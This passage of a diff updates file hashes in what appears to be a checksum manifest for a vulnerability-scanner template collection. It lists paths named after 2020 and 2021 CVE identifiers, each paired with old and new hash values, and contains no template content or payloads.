+http/cves/2020/CVE-2020-2733.yaml:4228c072ff589f8dcfdec3e3a01a4ff3e25f4f78 +http/cves/2020/CVE-2020-27361.yaml:6a83109bb88b4dea7e487caa47dfbfecbb34d973 +http/cves/2020/CVE-2020-27467.yaml:b0cbcfbd41aa93ee7a82eafebaeed139e1cc8b3c +http/cves/2020/CVE-2020-27481.yaml:d9cc8c36b8047f29ba3895c0479d41b452b16bfc +http/cves/2020/CVE-2020-27735.yaml:aaa80895532e6850f6de33cf398548922b39df20 +http/cves/2020/CVE-2020-27866.yaml:d69c51c5329c78aecba02da23e10f29768b1ff6c +http/cves/2020/CVE-2020-27982.yaml:ca75988be4e44a3ad072d7d187a6e938b6287a76 +http/cves/2020/CVE-2020-27986.yaml:d1c0d2dba2829173ad5124c8411c7786f9faa632 +http/cves/2020/CVE-2020-28185.yaml:4811d6fadf3d617bb9749cabe4f60930fb4d15ab http/cves/2020/CVE-2020-28188.yaml:5e8e013b799caa85226fbc26cf351da22e128bdd -http/cves/2020/CVE-2020-28208.yaml:38f5b1e554d75c8e50f2917a56691a5d95a28547 -http/cves/2020/CVE-2020-28351.yaml:146d01dc6a1d47000c6dd807f68cc70b29283ad2 +http/cves/2020/CVE-2020-28208.yaml:cb0822fdb4063e17cb0394e3f1ae71a31e0c1ad7 +http/cves/2020/CVE-2020-28351.yaml:234a86c10f144ceaac99056598f10177d52fd4b1 http/cves/2020/CVE-2020-28871.yaml:96b20492536e66f9c0f12a6c78817db0c22dc0c7 -http/cves/2020/CVE-2020-28976.yaml:86a538149f36db6f1d089a78fbb07c57541bf9a9 -http/cves/2020/CVE-2020-29164.yaml:8d2845bf0e05b921e49e843abb6ff39f4ff64b40 -http/cves/2020/CVE-2020-29227.yaml:c8f147db86df00a3a0825e8d98cfad8b701ed04e -http/cves/2020/CVE-2020-29284.yaml:7a1c8f57c076f43e043ae145700c6e3eb60d2b93 -http/cves/2020/CVE-2020-29395.yaml:c98d75712cd539279ee324cdf5b4b081e954b5d3 -http/cves/2020/CVE-2020-29453.yaml:bb1ab3d31a54ab4baa892201feccfc6bec3de64b -http/cves/2020/CVE-2020-29583.yaml:c0d199e8f8d98bf2746d78ddec322cfaf6308a78 -http/cves/2020/CVE-2020-29597.yaml:eeeebd032fd80b089356cc767fbde2968c7abd08 -http/cves/2020/CVE-2020-3187.yaml:1a3fd48c45392ba7250b5a090596b8529384422f +http/cves/2020/CVE-2020-28976.yaml:973ebe83f9ec9b21f522cbf691c2e6fd22a3d38e +http/cves/2020/CVE-2020-29164.yaml:c031cbe24e08c84bcb23342d246fe03f3fc7d9fd +http/cves/2020/CVE-2020-29227.yaml:a9fb9ff85cc92416f71021f26b01cc50fe257539 +http/cves/2020/CVE-2020-29284.yaml:9e768d48b021248a5760c5f826783da8de1b55a9 +http/cves/2020/CVE-2020-29395.yaml:ae8564a65a2e3698b864a420199dbb67f7759c3a +http/cves/2020/CVE-2020-29453.yaml:c78f8a1313a44fc67dea14185cc5780c916ca9ec +http/cves/2020/CVE-2020-29583.yaml:53d67c51c53fe363e91f21b73ad6831daf633ce7 +http/cves/2020/CVE-2020-29597.yaml:2fcd8fc35185398bf26ae12cca7a27e91beca943 +http/cves/2020/CVE-2020-3187.yaml:c3cc08ad0b1970bde5cf97f299b5554b0f55ee54 http/cves/2020/CVE-2020-3452.yaml:0ae0d94f016b237490216fb6f3e59c5c1bdbe280 -http/cves/2020/CVE-2020-35234.yaml:36947e6de00d7a76e48d2aa608c96d4d056ffcbb -http/cves/2020/CVE-2020-35338.yaml:8be055b5faad1b70fb9433906caa282098bb78a8 -http/cves/2020/CVE-2020-35476.yaml:2c10a903dbae57fa45b4dba85de3469c2fd920bc -http/cves/2020/CVE-2020-35489.yaml:e198cef02c4560b497e7f1b29d8ba7d1fd29391c -http/cves/2020/CVE-2020-35580.yaml:f4b7189677efa22bdce91948b88b7b62230d1f29 -http/cves/2020/CVE-2020-35598.yaml:e3356bf5299a86125e0de9bd663965af3dd69aa7 -http/cves/2020/CVE-2020-35713.yaml:73bc4ce0acaaad6901156ac67eba2f79ea95a337 +http/cves/2020/CVE-2020-35234.yaml:e45307bb56c535a4eadfca7c85fa094d9c404350 +http/cves/2020/CVE-2020-35338.yaml:c1a8e6ff2254b466821f846a170f124a990946a0 +http/cves/2020/CVE-2020-35476.yaml:d40241d5ab37decca33f31635f42e1be888df710 +http/cves/2020/CVE-2020-35489.yaml:369925ec7022368edfa6ae48c03f061b2fd9f0c3 +http/cves/2020/CVE-2020-35580.yaml:1cc7b326d20143151046cefc50b565f2d27dd16e +http/cves/2020/CVE-2020-35598.yaml:ea12115503721021b646a6a02a99a72a2e9f3bdd +http/cves/2020/CVE-2020-35713.yaml:b7a0f1893833e5796bfab2352c86b81b76e50c03 http/cves/2020/CVE-2020-35729.yaml:d20e40cfc49911db072b1355defc9c4077bbfa34 -http/cves/2020/CVE-2020-35736.yaml:adf0c5bdee5706664a031d44a2dca850b3cdee27 -http/cves/2020/CVE-2020-35749.yaml:f951b33ee0268801ba62816cb1e3a41727ae7842 +http/cves/2020/CVE-2020-35736.yaml:42ad2c493dddfd0ee97852f9c28710a80953ee41 +http/cves/2020/CVE-2020-35749.yaml:8635fffe1607851e1fbee23a77abb868cf15babc http/cves/2020/CVE-2020-35774.yaml:09ea32b2ab88dc315f7d28eb215eaf3a8208dd1f http/cves/2020/CVE-2020-3580.yaml:9f4e24a0db4b9395bbd852f93c8f8cbb87bfd6c5 -http/cves/2020/CVE-2020-35846.yaml:761bc77ec96ed6af26a502806b348674c30b05fb +http/cves/2020/CVE-2020-35846.yaml:f2b8cc4225f9ded829e4a9dd6f4c5722d033b5c4 http/cves/2020/CVE-2020-35847.yaml:1896e67b52358319e2dc2c73c0ed78bcfc160bcf http/cves/2020/CVE-2020-35848.yaml:5d6327de6079f60f8dac153f0f59ea7d597059d0 -http/cves/2020/CVE-2020-35951.yaml:4ef0e64e4a98a719461badd9e00b84173c5f7881 -http/cves/2020/CVE-2020-35984.yaml:d6106c7d97e3aa6404d09301366f1144f7804552 -http/cves/2020/CVE-2020-35985.yaml:b267cefa63682712ef1d6e7367bc96868d253dc3 -http/cves/2020/CVE-2020-35986.yaml:e842f2112242d67985f8bfb1356dba72b55ecb12 -http/cves/2020/CVE-2020-35987.yaml:fbe2cc1c0b2ce8336c892b70edbc4e74597aeaa9 -http/cves/2020/CVE-2020-36112.yaml:ca056951ae3651489641a82210908b1bc2a17ff3 +http/cves/2020/CVE-2020-35951.yaml:af3258bb0c83fc5fe004cd07e522ec23af1ff660 +http/cves/2020/CVE-2020-35984.yaml:c3a542b9957340f0fa442d6290f13886ace823fc +http/cves/2020/CVE-2020-35985.yaml:cf26353622c28a6e955a452e4765ada021c94707 +http/cves/2020/CVE-2020-35986.yaml:e787cc0414b3bbf8530bbc2a2d61ce74f6ef828e +http/cves/2020/CVE-2020-35987.yaml:0da1a6112e21ae32b41d14ad7ccfd33813057c43 +http/cves/2020/CVE-2020-36112.yaml:b9d57b42de3b78068c59cbc887eca13b95b4483e http/cves/2020/CVE-2020-36289.yaml:a8d1be4d495b0b3f6bbb860c8fee1a84eeca658d http/cves/2020/CVE-2020-36365.yaml:e622dc3cebe97aaf870fe3eacc0ec16430a1f733 -http/cves/2020/CVE-2020-36510.yaml:400a91719217a1a49790d3468442ec31c2e8b88d -http/cves/2020/CVE-2020-4463.yaml:da81556bc2c2172cc183da4452b0e6f67640af61 -http/cves/2020/CVE-2020-5191.yaml:e3e32c06b60be803fc84fec06afdd5d185f294c4 -http/cves/2020/CVE-2020-5192.yaml:e361c2b2c449c373458fcd9779223a74dc028f0c -http/cves/2020/CVE-2020-5284.yaml:f9324d46d999f067254b72a5dec5d5a80f793d9b -http/cves/2020/CVE-2020-5307.yaml:d6364d3c538a0ad063a729e29c7f7a43d81d6792 -http/cves/2020/CVE-2020-5405.yaml:21aa68d130dfa8319bfb3693a6abfd3aa96a6818 +http/cves/2020/CVE-2020-36510.yaml:f55a0325b2b501561717e221c96c1fd4aba8423c +http/cves/2020/CVE-2020-4463.yaml:f54ffd7665f2df427c72c076ad5a04053738b788 +http/cves/2020/CVE-2020-5191.yaml:d2073a79bb45239a8fe36001a90571dbb1e8531e +http/cves/2020/CVE-2020-5192.yaml:4bc669c2cb4b96654bed51976eee517b56cf5bc1 +http/cves/2020/CVE-2020-5284.yaml:b11dd396fbbdb682b8b71805ac83aba0b2bfb63a +http/cves/2020/CVE-2020-5307.yaml:38e6b5cf3284bdfbe10717e0afcd3fd65383e8fe +http/cves/2020/CVE-2020-5405.yaml:d821d9f87d6ecf763465eebeb2c35f1a269eeb7d http/cves/2020/CVE-2020-5410.yaml:0eff90857cae1ce8f33d8d9163578484cbd42bf5 -http/cves/2020/CVE-2020-5412.yaml:5b7198ad2671293e58ed1faf7b65a6cd2ceb9b58 -http/cves/2020/CVE-2020-5775.yaml:0a743f0e8f61c75772e5ab30dc6115cf7daf3a10 +http/cves/2020/CVE-2020-5412.yaml:520f263cef689ab1c3e64618a14e93dcdff2f9da +http/cves/2020/CVE-2020-5775.yaml:01305606eedbc8622b9ec5e6db8a35d39b6726d1 http/cves/2020/CVE-2020-5776.yaml:bf5764dbf9b3e17c8f2a27de4060f6934a0e1b23 -http/cves/2020/CVE-2020-5777.yaml:6112c310ddc3ce7b132ad35b1cd8150c345794fc +http/cves/2020/CVE-2020-5777.yaml:a6253c5982407b5839d95f02bf5e0f8ac7b31b76 http/cves/2020/CVE-2020-5847.yaml:f6517fd3307e79f7772e71cc0a1714e9b7fd8ee2 http/cves/2020/CVE-2020-5902.yaml:55dfd65e105c5ee30a15fc7a1704a47ee477c03c -http/cves/2020/CVE-2020-6171.yaml:b24382e8452af189d22dfca05f8352b5198fcc4a +http/cves/2020/CVE-2020-6171.yaml:65e61c13554b11e69cea20db6034acc91fb4b82e http/cves/2020/CVE-2020-6207.yaml:3a09b55e11e47d31ba24fca6f6c8f18d3ac8dd69 http/cves/2020/CVE-2020-6287.yaml:78ec8a7ea626f5e40e6c5b1c139c23e52dc5b213 -http/cves/2020/CVE-2020-6308.yaml:3dcf7334461d6a3a54587f8980fed7df375fb7ec -http/cves/2020/CVE-2020-6637.yaml:9afdadf96b9e6f80062d0545ea2529300eda2722 -http/cves/2020/CVE-2020-6950.yaml:39394c67eade01e400efd0634f50b518a1c3d1fb -http/cves/2020/CVE-2020-7107.yaml:4f4f27f9d3d3dbf1195c8a0151a1ba0ae8eadd39 -http/cves/2020/CVE-2020-7136.yaml:d7b8bbe22c387b7c6608542ef63e40744ce3a8e0 -http/cves/2020/CVE-2020-7209.yaml:2e1266f7fb394b14dc5a8c91e33126310e2f7c85 -http/cves/2020/CVE-2020-7318.yaml:359dfd9756edb69f6534975ad2fa050328fbc1a8 -http/cves/2020/CVE-2020-7796.yaml:89d4554d29a245decee672bfc1e3d12abc90c6d8 -http/cves/2020/CVE-2020-7943.yaml:9c318eea84554e1b3b5130b790a8828efff6d5dc +http/cves/2020/CVE-2020-6308.yaml:f4216a8be578b4ce2ad3dfea94955df0c1b14491 +http/cves/2020/CVE-2020-6637.yaml:d6bdce37a2f0876ac63b2165572f42ac3f29b1d3 +http/cves/2020/CVE-2020-6950.yaml:9eb37bb1efbd1b50f8d2185f0f2d85f5141982db +http/cves/2020/CVE-2020-7107.yaml:aeefb504285246ad172d7c0c6f069d9f1b004f66 +http/cves/2020/CVE-2020-7136.yaml:0317d8b9ec25dbe08b2bf3211ef79b7f812375af +http/cves/2020/CVE-2020-7209.yaml:35230e394c27caf598511ed84c622728c3e0854d +http/cves/2020/CVE-2020-7318.yaml:1a9a2ccfdce54000eb3597718bcd0a1c02db52ac +http/cves/2020/CVE-2020-7796.yaml:28f147c844d176282175f8f850910f6ea250a841 +http/cves/2020/CVE-2020-7943.yaml:1eea8c19e326bd23634c33948e5705ffed5e5e48 http/cves/2020/CVE-2020-7961.yaml:e8b61fdb73063793a5a31af5cded1bd4776945b7 http/cves/2020/CVE-2020-7980.yaml:4d5deb719e291762ba60983364caa60dae844518 -http/cves/2020/CVE-2020-8115.yaml:f0e335b85480572caa0edc6ab16323d940d18c52 +http/cves/2020/CVE-2020-8115.yaml:32fbacdd0b6b7d3c028f3a5110add430fef22050 http/cves/2020/CVE-2020-8163.yaml:885fbf9ef561bb720c98993f6aeb2cd60b51170e -http/cves/2020/CVE-2020-8191.yaml:7d1d0e056100e5bb14553f32f2c5ee5b3f25c9cb +http/cves/2020/CVE-2020-8191.yaml:313ea7d82a8fce5f5e56b775f60ba9ca5dc2931d http/cves/2020/CVE-2020-8193.yaml:62d20c397cd8252f87649e0b8080219ef84151a4 -http/cves/2020/CVE-2020-8194.yaml:06145288feac51d652b083bf7e01bdd9d3b59c2c +http/cves/2020/CVE-2020-8194.yaml:1d2a427c932c48020dabb74aed71969ca878f8e6 http/cves/2020/CVE-2020-8209.yaml:2462c551442601a7b040937440edc28f751419be -http/cves/2020/CVE-2020-8497.yaml:a2ab82bc10e06fa0c47a6aff2fff68d18017e29c -http/cves/2020/CVE-2020-8512.yaml:ad030e59b0cf2ea3d787b35daeb5a39b9d715500 +http/cves/2020/CVE-2020-8497.yaml:315dc32ea471403973551c051f07480ad1e089e2 +http/cves/2020/CVE-2020-8512.yaml:f029b90c9e0fdc23e1bb9896c462ae7e5e8467b4 http/cves/2020/CVE-2020-8515.yaml:57b2ef2cf01cd138b28f440cd4e213e0a981eb55 -http/cves/2020/CVE-2020-8615.yaml:1d9b101105c7207d240cd7ff1e4c2b96eac4f40c -http/cves/2020/CVE-2020-8641.yaml:04682b74fef609442861213914e94bef86ee50fd -http/cves/2020/CVE-2020-8644.yaml:5c128dc0c7f2a355e29cdc8d74eb79df7af3626b -http/cves/2020/CVE-2020-8654.yaml:d5c5a32c6981bb0f7f0c5a98ccdea61a63a5d86a -http/cves/2020/CVE-2020-8771.yaml:4af83d524c131060a9f95b93b9ae0a68d43e9c9d +http/cves/2020/CVE-2020-8615.yaml:a430e149bf4b581f66bfca6c90ecf57bc55b80be +http/cves/2020/CVE-2020-8641.yaml:8e406e2b760700551c2051a8b57353e9cce07a1d +http/cves/2020/CVE-2020-8644.yaml:5bf6691849e5f04c860bf445be4bfa1cdd6f1a54 +http/cves/2020/CVE-2020-8654.yaml:a88656ede4a3d722825834886a97fab43e0badd0 +http/cves/2020/CVE-2020-8771.yaml:66f59d4451a4c57cf9938d7e7d821b111c0a78d6 http/cves/2020/CVE-2020-8772.yaml:25381b8c17954f180fe574aa293683d01066fb12 http/cves/2020/CVE-2020-8813.yaml:57dffaa2dcb941043c2312b3143b9dd04c9ee677 -http/cves/2020/CVE-2020-8982.yaml:7dab560ef560d03a7640f57b8af118d23ea69d41 -http/cves/2020/CVE-2020-9036.yaml:6f75607038547f5eef8da0909b67db03d86519f3 -http/cves/2020/CVE-2020-9043.yaml:a5c33a0e00c455e08e75361733a8f1550f8c6da8 -http/cves/2020/CVE-2020-9047.yaml:665f8e844d45fb04fa89b91aad77a62599cebce3 +http/cves/2020/CVE-2020-8982.yaml:4b1bd817ca745a56f16f5ac105aa7c0445a8d06e +http/cves/2020/CVE-2020-9036.yaml:11cb44e758a7b390c85571e71ecb3bbf43db9026 +http/cves/2020/CVE-2020-9043.yaml:69ff9a63034e027aae354b958095ab2023da851d +http/cves/2020/CVE-2020-9047.yaml:324cdd27c825fb2069026be2404d520397b794a5 http/cves/2020/CVE-2020-9054.yaml:714e6ccc2eda83b20713c0d80a6f8ef0d78f38a9 http/cves/2020/CVE-2020-9315.yaml:7e6aa3e55f2440bccf3f59ef2d34eab259ce1aa6 -http/cves/2020/CVE-2020-9344.yaml:f3e6cb6c79a0555eb7af8ee2b5cca893e31bdafb -http/cves/2020/CVE-2020-9376.yaml:c6d264ed6b53a6052ad6b7a313954d38dbcfddca -http/cves/2020/CVE-2020-9402.yaml:fbecdeed262e3963a0f1fb36870a354b69bff6c1 -http/cves/2020/CVE-2020-9425.yaml:3bedc8253ac607d6c3ee556bbe514d7b12292651 -http/cves/2020/CVE-2020-9483.yaml:2afc4af15c3d5de5d3892e5aebc8853ec4720f67 +http/cves/2020/CVE-2020-9344.yaml:7f44e7b3bc8d4d931a53df1bf7fa583fcc34a00d +http/cves/2020/CVE-2020-9376.yaml:fc6334b86949fd75822c69ca48da880cb3cc92a4 +http/cves/2020/CVE-2020-9402.yaml:ab15a8f0f2ab8b81b41fd37ec574434085296ed0 +http/cves/2020/CVE-2020-9425.yaml:8f3007fe9c522ee465181d56301d7fac211cfb8c +http/cves/2020/CVE-2020-9483.yaml:33736925063aa68fd961237274645154b467f051 http/cves/2020/CVE-2020-9484.yaml:815c7c2a7b9d1b8abf607e9033b8adc5d08e3b2f http/cves/2020/CVE-2020-9496.yaml:d7e33245477e7f08e2159cb0d41936c33acff739 http/cves/2020/CVE-2020-9757.yaml:34513ff0f7972ce4ced689453e191ca71d9c4f71 @@ -1672,32 +1672,32 @@ http/cves/2021/CVE-2021-1472.yaml:cf21007ca69c3c3b7c3a991ffea8472e600541c2 http/cves/2021/CVE-2021-1497.yaml:57150e1facea489efd95770d24930971db6fd873 http/cves/2021/CVE-2021-1498.yaml:2b577e632d6486fe66b6a92df893ffff366662f1 http/cves/2021/CVE-2021-1499.yaml:d362996737d9745a4ab1f6845b2eeab017123daf -http/cves/2021/CVE-2021-20031.yaml:8c6de4423e0778a977cd2733b4f774478bc7f169 -http/cves/2021/CVE-2021-20038.yaml:d0f28a8e0b4a5d7f90951058d20cfbf8cfa620e4 +http/cves/2021/CVE-2021-20031.yaml:ffc31a42b0632ea34e701725058a01642f133277 +http/cves/2021/CVE-2021-20038.yaml:afc03141d021cdcd3bec22a8467772259138a4f4 http/cves/2021/CVE-2021-20090.yaml:8813d03e75056ba4b2c32f41535c9a9c9159015f -http/cves/2021/CVE-2021-20091.yaml:7221b839ca95458b7f767cf7d30cc581e064bb69 -http/cves/2021/CVE-2021-20092.yaml:2950fcaea9df58eb1c849d37611ea536e583730b -http/cves/2021/CVE-2021-20114.yaml:b3ff974ca710ed179589ffd51b0884cd3f893009 -http/cves/2021/CVE-2021-20123.yaml:4f4f35da21c45f01694a10c648917c844e1c3524 -http/cves/2021/CVE-2021-20124.yaml:d0892f555044c5ee4f17ce56624a4a469e19f49d +http/cves/2021/CVE-2021-20091.yaml:c9fe38a85a3408891b4a0f66855b4175605e5de0 +http/cves/2021/CVE-2021-20092.yaml:1f040e5acd5978853936c55c2f1e525052ffde01 +http/cves/2021/CVE-2021-20114.yaml:cadf7de9ccc6ffb98b84e55a01589f1d70646800 +http/cves/2021/CVE-2021-20123.yaml:66ea34374d5dc6a5d5b0ac8ed0cc91e0379b2e91 +http/cves/2021/CVE-2021-20124.yaml:7bf042f2d2c555335d5806d9c01d2adafcc994bd http/cves/2021/CVE-2021-20137.yaml:798a99c1722cdd46f207076a46bfe9800fa81c99 -http/cves/2021/CVE-2021-20150.yaml:436eb601deb4e4d3cf0dd9eaa14a0eec5399251b -http/cves/2021/CVE-2021-20158.yaml:11f760fb5cfe2cd5712746d83ac0b6f8a0cbf9ea +http/cves/2021/CVE-2021-20150.yaml:531abeb43a659000f45700d1c158e40bca59ef24 +http/cves/2021/CVE-2021-20158.yaml:0d155ec79180165543d414a05d206763b53e788d http/cves/2021/CVE-2021-20167.yaml:cb7ebbca5354c11e82d2a3de1fb52170f4a4d01a -http/cves/2021/CVE-2021-20323.yaml:d8060e9b3900abbecd27f2d95fc445d8e452b73c +http/cves/2021/CVE-2021-20323.yaml:d2dfd70c12bf0916f7d33cb3b4a5292b60c52479 http/cves/2021/CVE-2021-20792.yaml:f3a993979cfd407d3b091d2622c7f96e0e7e5a3d http/cves/2021/CVE-2021-20837.yaml:cd4db3e09d54a9600e0f2a5a69056d237138b3af -http/cves/2021/CVE-2021-21087.yaml:82cb069f5f8e5541e6099c62abef7f0465af76e8 +http/cves/2021/CVE-2021-21087.yaml:a8639fd66b17827b9feab6851309353ea7cdb53e http/cves/2021/CVE-2021-21234.yaml:0b6a908b07a050b3ed6e9f3944fa5796b24b6e05 -http/cves/2021/CVE-2021-21287.yaml:d7a778df12bbad970390a8a2c7465f8e84b0c956 +http/cves/2021/CVE-2021-21287.yaml:83958b982d50f33cd3e4233dd224c0af74a93864 http/cves/2021/CVE-2021-21307.yaml:624dd1b721ead4eb70a854cd087f6eac2297481d -http/cves/2021/CVE-2021-21311.yaml:5e218d659556b7a0e35cc0a64f91985d720e2e94 +http/cves/2021/CVE-2021-21311.yaml:c0da6638fd4edcc6ce88fe56621279ff8e852c16 http/cves/2021/CVE-2021-21315.yaml:9296e9399ab0f1e886d0619c0973ee6ecc9c4967 -http/cves/2021/CVE-2021-21345.yaml:360156c4b7fc2c8694bed11c60fcd0ccd514df9c +http/cves/2021/CVE-2021-21345.yaml:6ff18b6d8367e6055cac16f4388ba8e8b5929201 http/cves/2021/CVE-2021-21351.yaml:e81cf80edb0e2107ab1f8e13faaa031c56465ee2 http/cves/2021/CVE-2021-21389.yaml:ffeab2d4df862246d4666f411a3d96199253d72d -http/cves/2021/CVE-2021-21402.yaml:64a3e6054034e296144501a6bb62f255a35959d8 -http/cves/2021/CVE-2021-21479.yaml:0e65773a36b04e5b6cdb18a09896288c377017b2 +http/cves/2021/CVE-2021-21402.yaml:fc1c7b7e0da20e11dc3f24ea8123de9f09231a07 +http/cves/2021/CVE-2021-21479.yaml:d328b8d330b3bd3119375e1d3b6e219819636329 http/cves/2021/CVE-2021-21745.yaml:1dd5b05f5745007431f4bba6941e942846923e02 http/cves/2021/CVE-2021-21799.yaml:9bb8b1b0614e9d735122cab193b87b51940aa1c5 http/cves/2021/CVE-2021-21800.yaml:1f960024f7950f89149817e94140b678300a3b43 @@ -1705,7 +1705,7 @@ http/cves/2021/CVE-2021-21801.yaml:0b2c781d49488957db6f0d2703d3fe3f7b9dc13e http/cves/2021/CVE-2021-21802.yaml:5659f4df8fa9227236580a137a4033813102210c http/cves/2021/CVE-2021-21803.yaml:1129c15d36cd23c4617fdd78da419cabc39493e4 http/cves/2021/CVE-2021-21805.yaml:24c38960bb41f30e2b23b0bd1d74b049ea4705bd -http/cves/2021/CVE-2021-21816.yaml:46730933334536acbb638120a8ec4acf26106fd9 +http/cves/2021/CVE-2021-21816.yaml:63d59ed696ae3f6fa9030531ea007524b2b42640 http/cves/2021/CVE-2021-21881.yaml:4068be33e64be5a81519c96b2dc42533f50eee7c http/cves/2021/CVE-2021-21972.yaml:88512027651ad0982c2ba0da0d31981881cdc47d http/cves/2021/CVE-2021-21973.yaml:e3cf79965c519063e2732a06ba6f34f4f7ec3c26 @@ -1713,1107 +1713,1108 @@ http/cves/2021/CVE-2021-21975.yaml:bd209f3f32ec032c656ebbda86d66a05985eddc9 http/cves/2021/CVE-2021-21978.yaml:5e0b35e9e2c91b19171faca9b5ad6179b00dcc46 http/cves/2021/CVE-2021-21985.yaml:78df0988d62ba9409bc93c190628a774ff1027be http/cves/2021/CVE-2021-22005.yaml:c534340d14c1efdf293646fe468ad4bdbe978084 -http/cves/2021/CVE-2021-22053.yaml:50c929cc4d4a5013be655c89e3e8c3069a4039e7 +http/cves/2021/CVE-2021-22053.yaml:bad7c3beb72d2f14c0669f27d44e68164404b300 http/cves/2021/CVE-2021-22054.yaml:cbb150d2839db9ff4c75ad00ae72d9868d2d02b0 -http/cves/2021/CVE-2021-22122.yaml:a003bb0befbc6a6a8501d1e0f28256c3e46ba113 +http/cves/2021/CVE-2021-22122.yaml:a7fb73d1f6a6ef6ebda0329030501dcdb8d45d69 http/cves/2021/CVE-2021-22145.yaml:f0d04575f3ce18c1a432897beff3c756a77539db http/cves/2021/CVE-2021-22205.yaml:e03c1c23ebcaff76263de21b695e953ce42e29c1 -http/cves/2021/CVE-2021-22214.yaml:f659333251b71ae606498d0e46e0a2d2702916fc +http/cves/2021/CVE-2021-22214.yaml:1d765c14e7973cb0364ceeeb841773827aab57fe http/cves/2021/CVE-2021-22502.yaml:d83a7f4e605208a5364ac504e6943ff0d1605a34 -http/cves/2021/CVE-2021-22707.yaml:7b90fafc045335bdf29ecdcce3b47df530220748 -http/cves/2021/CVE-2021-22873.yaml:0f232646a4e23e382a851125f10079d76634d97b -http/cves/2021/CVE-2021-22911.yaml:23cf26c3589a63dc5be2a7f7a085531e3705e29a +http/cves/2021/CVE-2021-22707.yaml:20dde0b26ac670478590cb2ab8bd3b2e7f8033c3 +http/cves/2021/CVE-2021-22873.yaml:0fa05dbda3cc3d85d4febb5047cd97fd93aaa62a +http/cves/2021/CVE-2021-22911.yaml:79c11d5c102bce1d3bbd7b82cc792200c5fc8e40 http/cves/2021/CVE-2021-22986.yaml:8d4709f638cbb498f9b9d8899ff09244417ca816 -http/cves/2021/CVE-2021-23241.yaml:c96a51bd6bf01f2a6ea677a6d5be75d6afdbca19 +http/cves/2021/CVE-2021-23241.yaml:eea4ac25786a439cb22e3710a58d4b7dd006aed3 http/cves/2021/CVE-2021-24145.yaml:1636f6db000400859f8ee8f3d8c6212bacb6de04 -http/cves/2021/CVE-2021-24146.yaml:6a137dd991150ac8d971adbbc25a460d284767c6 -http/cves/2021/CVE-2021-24150.yaml:5f5bfbc9dcf1ab08ca7ac111eef26dcaccb3a1d8 -http/cves/2021/CVE-2021-24155.yaml:9050994b7607f725bc92e02219cd4f56ae47c4a1 -http/cves/2021/CVE-2021-24165.yaml:58b7c291343047fa3b6d051593021bbf2dcbbecb -http/cves/2021/CVE-2021-24169.yaml:ce2d2cfe1a05f9323b79824ee8977724fedd9ace -http/cves/2021/CVE-2021-24176.yaml:7207a041843759499628256a317d617bf407faf1 -http/cves/2021/CVE-2021-24210.yaml:7798396963ff765c6625b49d01edc838978cd2fc -http/cves/2021/CVE-2021-24214.yaml:6594ea3ffb8c0e15227d0739c580bdf953ec1a94 -http/cves/2021/CVE-2021-24215.yaml:bf7e63a84abd65ddd814134c9c750939160a6c72 -http/cves/2021/CVE-2021-24226.yaml:7fe774357b7d2753209462b92667c8355995f627 -http/cves/2021/CVE-2021-24227.yaml:dea121a3cd9ff05eadbb1c77d7d7587ae80f8d8a -http/cves/2021/CVE-2021-24235.yaml:58c0fb00209d0ffb15259e9a6ba793268d80d16a -http/cves/2021/CVE-2021-24236.yaml:45436a29da693b484a1fa90439ab0c66545398e0 -http/cves/2021/CVE-2021-24237.yaml:5c0a41ac28500bd9b97bf911584e1208c565cd21 -http/cves/2021/CVE-2021-24239.yaml:ceedadefd8dea2200e936ab8921b627b72072ba8 -http/cves/2021/CVE-2021-24245.yaml:566f1875f23007b64ba908f01db8f2374be5123e -http/cves/2021/CVE-2021-24274.yaml:6237723c2a1a5d2064e19e07e31361649937573b -http/cves/2021/CVE-2021-24275.yaml:56d68d2f2459c71c53a59008783c26589bcfb499 -http/cves/2021/CVE-2021-24276.yaml:e82060e101d888326e7ffff6544016330bdb31c2 -http/cves/2021/CVE-2021-24278.yaml:091f92ee270b03e6bf496f873838c64971588a39 +http/cves/2021/CVE-2021-24146.yaml:9232f493a79c03dea18a54e7a7b1e0bd8f582840 +http/cves/2021/CVE-2021-24150.yaml:8e5e9daab0143876afd16d42e629670a4569dcd3 +http/cves/2021/CVE-2021-24155.yaml:dd1515caf91a39ad0c5099c62c6027c7124e6a1e +http/cves/2021/CVE-2021-24165.yaml:9450f858590e99c66f41e0a812cd1e0023504076 +http/cves/2021/CVE-2021-24169.yaml:712aebe63e8f8e6cea22c7b955b612d860c9e78e +http/cves/2021/CVE-2021-24176.yaml:786408332e51a20d6d28181237b58869056c8de1 +http/cves/2021/CVE-2021-24210.yaml:1bbeecfc824d078586b88ac4a337f9c9d54d74b6 +http/cves/2021/CVE-2021-24214.yaml:16fc0346d53cea533a53f48852fd38a94b4a31c2 +http/cves/2021/CVE-2021-24215.yaml:4f84dfb17942ef0bdfb7f321d60a37d804f3b8c5 +http/cves/2021/CVE-2021-24226.yaml:ed21252462812c102952e319b263eabb0af73eac +http/cves/2021/CVE-2021-24227.yaml:f34b0b577d1c8fd37b2a4e37014426f86c19ebf3 +http/cves/2021/CVE-2021-24235.yaml:bcc6b625b9f22da9ac4bc1e4be0e27f97d149b6e +http/cves/2021/CVE-2021-24236.yaml:a431ed53ade833e6fce6f9db0d15f39e9337495e +http/cves/2021/CVE-2021-24237.yaml:c8bcf9ccc0e7de8a85b2fe0003c35693486abb01 +http/cves/2021/CVE-2021-24239.yaml:36f2216a79e9e64b191e7ee0c47bdec8b47f5a19 +http/cves/2021/CVE-2021-24245.yaml:e17f2578bd44576dd41786edccc957ca9fa9e69d +http/cves/2021/CVE-2021-24274.yaml:5bc3064cb0e07b05c57efb71b128968a922b7956 +http/cves/2021/CVE-2021-24275.yaml:ee6c9c5718ee36fb3af935eeef41b560135d385d +http/cves/2021/CVE-2021-24276.yaml:80911c18608fcda03f8cf5cac2d054c17f19e315 +http/cves/2021/CVE-2021-24278.yaml:15da82c569eb097e9bd55facb97550cc0f93a826 http/cves/2021/CVE-2021-24284.yaml:1283199e997e828342e0237f9feedce138be71e9 -http/cves/2021/CVE-2021-24285.yaml:03929ba5992a2a179310d731e9c2bfe05cb61f54 -http/cves/2021/CVE-2021-24286.yaml:9888cd1ff7006771d49f88d382ec18de8d80e27b -http/cves/2021/CVE-2021-24287.yaml:48e3b611cce2057a1e073ff6b4cdcfa3aee73e73 -http/cves/2021/CVE-2021-24288.yaml:f47a1069bc64970af4d8df60a52dfc79714b927b -http/cves/2021/CVE-2021-24291.yaml:b2ff6324512e6c948073cb5262e8957b47a7e53d -http/cves/2021/CVE-2021-24298.yaml:27a37e122444f98c54f83cd491e90f0a3faa81ad -http/cves/2021/CVE-2021-24300.yaml:2338de636d678c3d1f67e6bb52751818672f2737 